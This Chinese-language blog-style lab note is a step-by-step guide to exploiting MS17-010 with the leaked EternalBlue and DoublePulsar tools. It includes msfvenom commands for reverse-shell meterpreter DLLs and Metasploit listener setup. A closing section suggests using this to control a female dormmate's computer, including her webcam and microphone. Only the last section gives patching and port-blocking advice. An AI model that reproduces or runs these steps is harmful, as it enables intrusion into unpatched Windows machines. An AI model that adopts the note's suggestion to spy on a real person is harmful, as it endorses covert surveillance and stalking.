声明：仅供学习交流使用，个人实验笔记。排版比较懒。

微软MS17-010
理论：SMBv1 漏洞攻击，445端口。

环境准备：

攻击资源：攻击工具包 点我
攻击者系统：Windows 7 Ultimate (x64) 点我
受害者系统：Windows 7 Ultimate (x64) 点我，winXP，win2008，win2003均可。 点我
辅助攻击用系统：kali 点我
推荐虚拟环境构建工具：vmware workstation或oracle Vbox工具下载

操作：

1、攻击者环境部署（确保路径全英文）：
虚拟机部署win7 64位环境，要么都桥接，要么都选择自定义网络。
下载python2.6并安装点我
下载pywin32并安装，一定要注意，下载对应python版本点我
将C:\Python26添加到环境变量PATH中。
将攻击工具包拖入虚拟机，或上传到虚拟机。解压后，里面有个Windows的目录，复制出来到虚拟机的c盘。
新建 listeningposts 目录。

2、受害者环境部署：

受害者系统自选一个就行，随意，安装后，需要和攻击者系统能互相ping通。

3、攻击操作：

攻击者在cmd下运行fb.py
target IP就是受害者IP
callbackIP就是攻击者的IP
USE redirection输入NO
base log 输入 c:\logs或输入NO（是否有日志记录，这个是自愿）
接着输入0，新建了一个攻击项目。
项目名称随意（英文以外名字可能会报错）。
然后输入yes确认
其他的直接回车就行了。英文可以用有道翻译。
use EternalBlue
问你是否要setting。输入yes
下面的回车就好，都是默认好的配置。
target system，如实选择受害者的系统。
mode选择fb，即输入1。
剩下的就是yes和回车了。
当出现success关键词的时候，说明攻击第一步已经完成了。
（失败的原因：
1、防火墙的保护。
2、杀毒程序的保护。
3、网络通信异常。
4、人为操作失误。）

部署辅助攻击系统：

1、部署kali，可以和攻击者正常通信即可。
2、攻击者安装xshell。
3、通过xshell ssh到kali即可。（百度关键词，kali开启和配置ssh服务）
4、利用kali 的msf生成后门文件。（LPORT端口参数随意，只要不冲突就行）
如果受害者是winXP 32位：
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali系统的ip LPORT=19999 -f dll > /tmp/attack.dll
如果受害者是win7 64位：
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=5555 -f dll > /tmp/attack.dll
确认xshell已经连接到了kali，
在xshell输入：sz /opt/attack.dll 
选择保存在攻击者系统的c盘根目录下即可。
xshell下：
msfconsole
use exploit/multi/handler //启用了监听模块
受害者是winXP的时候：
（ set payload windows/meterpreter/reverse_tcp
set LHOST kali的ip
set LPORT  19999  
show options  //看一眼配置
run //开启了监听
）
受害者是win7 64位时：
（
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost kali的ip
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit
）

在攻击者的cmd下：
use Doublepulsar
操作系统选择目标的。
选择RunDLL
路径输入：c:\attack.dll
其他各种回车确认。
可以看到，xshell连接的kali，收到了会话连接。
可以输入whoami或者dir来验证一下。

其他资源（感觉部署环境好麻烦，想来点现成的）：

在线现成的环境操作实战：点我在线实战
kali下直接实现攻击利用：http://www.jianshu.com/p/f770d0bbed77

杂谈

一般情况，女生的电脑如果和你在一个网络，比如你们宿舍之间，没有做严格的隔离，那么，理论上讲，可以完整的控制她的电脑，除非她安装了360，为何不说她安装了腾讯管家。因为，对付一些漏洞，需要足够的浪才可以，管家还是太文绉绉了。
（不仅可以截屏，还可以看摄像头，还有录音。另：现网实战前，请阅读：https://www.ishuo.cn/doc/mzlpnnqf.html）

预防和其他参考：

360提供了懒人模式的NSA攻击自动检测和防护工具，免安装。点我
使用防火墙过滤/关闭 137、139、445端口。
对于 3389 远程登录，如果不想关闭的话，至少要关闭智能卡登录功能。
安装微软补丁：请前往微软官方网站下载与自己操作系统匹配的安全补丁进行更新
MS08-067：https://technet.microsoft.com/zh-cn/library/security/ms08-067.aspx
MS09-050：https://technet.microsoft.com/library/security/ms09-050
MS10-061：https://technet.microsoft.com/zh-cn/library/security/ms10-061.aspx
MS14-068：https://technet.microsoft.com/library/security/MS14-068
MS17-010：https://technet.microsoft.com/zh-cn/library/security/MS17-010